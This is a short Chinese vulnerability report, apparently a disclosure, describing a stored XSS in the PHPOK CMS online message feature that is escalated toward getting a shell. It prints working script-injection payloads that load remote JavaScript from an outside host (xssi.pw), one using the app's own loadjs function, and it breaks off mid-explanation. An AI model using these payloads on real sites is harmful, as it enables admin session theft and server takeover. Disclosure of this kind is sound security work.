PHPOK#XSS利用突破到GetShell第一发

简要描述： 数据库对存入进行过滤，但是取出来的时候，仍然可利用XSS完成GetShell. 详细说明： 在线留言功能里面留言主题在存入数据的时候都进行了过滤 数据库内容 数据库的字段长度为255，可以写任何的数据进去操作了 如: ';var s=document.createElement'script';s.src='http://xssi.pw/fPJgOU';document.body.appendChilds;' 另外： ';loadjs'http://xssi.pw/fPJgOU';' loadjs这个在自己加载的JS里面admin.php?c=js，内容： var...